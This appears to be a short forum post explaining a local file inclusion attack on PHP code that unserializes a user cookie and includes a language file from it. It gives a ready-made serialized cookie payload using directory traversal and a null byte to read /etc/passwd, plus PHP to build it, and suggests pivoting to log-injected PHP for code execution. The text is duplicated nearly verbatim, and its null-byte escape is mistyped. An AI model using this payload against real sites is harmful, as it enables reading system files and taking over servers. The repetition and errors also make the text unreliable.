<?php
$settings=unserialize($_COOKIE[user_settings]);
include("include/lang/".$settings['lang'].".php");
?>
quite obvious, you need to set a cookie like this:
user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";}
it is the result of:
[code lang=php]
<?php
$settings=array();
$settings['lang']="../../../../../../../etc/passwd/x00";
$settings=serialize($settings);
echo $settings;
?>
[/code]
the same with apache logs or something...
where you have injected some php code
$settings=unserialize($_COOKIE[user_settings]);
include("include/lang/".$settings['lang'].".php");
?>
quite obvious, you need to set a cookie like this:
user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";}
it is the result of:
[code lang=php]
<?php
$settings=array();
$settings['lang']="../../../../../../../etc/passwd/x00";
$settings=serialize($settings);
echo $settings;
?>
[/code]
the same with apache logs or something...
where you have injected some php code
